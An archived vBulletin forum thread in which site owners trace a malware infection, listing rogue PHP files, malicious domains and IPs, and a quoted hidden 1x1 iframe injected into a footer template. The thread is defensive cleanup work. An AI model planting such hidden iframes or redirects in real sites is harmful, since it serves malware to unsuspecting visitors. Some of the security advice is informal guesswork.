The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
|
#11
01-02-2012, 09:03 PM
|
|||
|
|||
I have some of the same extra files as you:
blog_search.php commons.php coms.php jquery.php But not the HTML files you have. I'm still having trouble though. I followed the steps suggested: 1. Suspect File Versions. Done, found those extra PHP files above and renamed them. 2. Disabled all plugins (only VBseo) 3. Exported the database, searched the SQL for the offending domain names and IP addresses. None found. 4. Searched through my files for the domain names and IP addresses. None found. (Is it possible that it's encrypted in the files somehow so a search wouldn't find it?) 5. I don't have ads running, so that's not a problem. Just wondering, do web servers cache files? So if I make a change and refresh (delete my own browser cache first), and I still get virus issues, is it possible the change DID work, except the server has it cached temporarily? --------------- Added [DATE]1325542075[/DATE] at [TIME]1325542075[/TIME] --------------- By the way, I found the offending domains/IPs by using Firefox/FireBug, in the "Net" tab it shows all the files requested, and there I saw some files being requested from other domains: URL, Status, Domain, Size, Remote IP GET http://44444vvvvv.mefound.com/dng311...cfc3b06a/0.php, 302 Found, 44444vvvvv.mefound.com, 20 B, 95.163.89.230:80 GET http://44444vvvvv.mefound.com/dng311...c3b06a/spl.php, 302 Found, 44444vvvvv.mefound.com, 20 B, 95.163.89.230:80 GET http://kokosina.in/t/go.php?sid=5, 302 Found, kokosina.in, 20 B, 46.37.184.227:80 These are the domains/IPs I searched for in the SQL and in the files. I also spotted those PHP files as weird because they had recent "modified" dates whereas the original files were untouched. 
|
|
#13
01-02-2012, 11:25 PM
|
|||
|
|||
|
</div><div style="display:none"><iframe src="http://www.cookaround.com/cook/robots.php" width="1" height="1"></iframe></div>
this iframe seems to be added check the footer template not sure if you want that there --------------- Added [DATE]1325550426[/DATE] at [TIME]1325550426[/TIME] --------------- http://www.malwaredomainlist.com/mdl...=78.111.51.119 --------------- Added [DATE]1325550515[/DATE] at [TIME]1325550515[/TIME] --------------- http://support.clean-mx.de/clean-mx/...t=first%20desc
|
|
#15
01-07-2012, 04:44 PM
|
||||
|
||||
|
Quote:
95.163.89.230:80 <--- address blocked, but its not the address for my site, what add on or plugin is causing this? I disabled all the add on's and I still have the virus, I found all the suspect files the common.php, coms.php, jquery.php ect and deleted them already but I still have this virus issue, It sure would be nice to find the source of this and prevent it from happening in the future. myke
|
|
#16
01-07-2012, 07:45 PM
|
|||
|
|||
|
I've been having a lot of issues with the same stuff. After several attempts to find the bugs, it was determined the server was compromised. I just switched servers with a trusted forum member here and the site was back up in two minutes and runs like a charm.
Just because someone offers hosting doesn't make them a good host...especially if they have clients with a grudge for ripping them off. ...I'm just saying pick your host carefully.
|
|
#17
06-11-2012, 06:32 AM
|
|||
|
|||
|
I heard that these malware scripts are getting in to your webserver by hacking your ftp password. What you have to do is find that malware files or code and delete. Submit your website to re-evaluation through google webmaster tools.
Hackers might get your saved password in ftp. So delete history and change the password immediately. Recent times I am not using ftp. I am uploading zipped files directly through cpanel to prevent from hackers. We should not blame your host regarding this issue. Hackers getting in to web server through your PC. So clean your PC with any good antivirus.
|
 |
«
Previous Thread
|
Next Thread
»
Linear Mode
|
|
All times are GMT. The time now is 05:06 AM.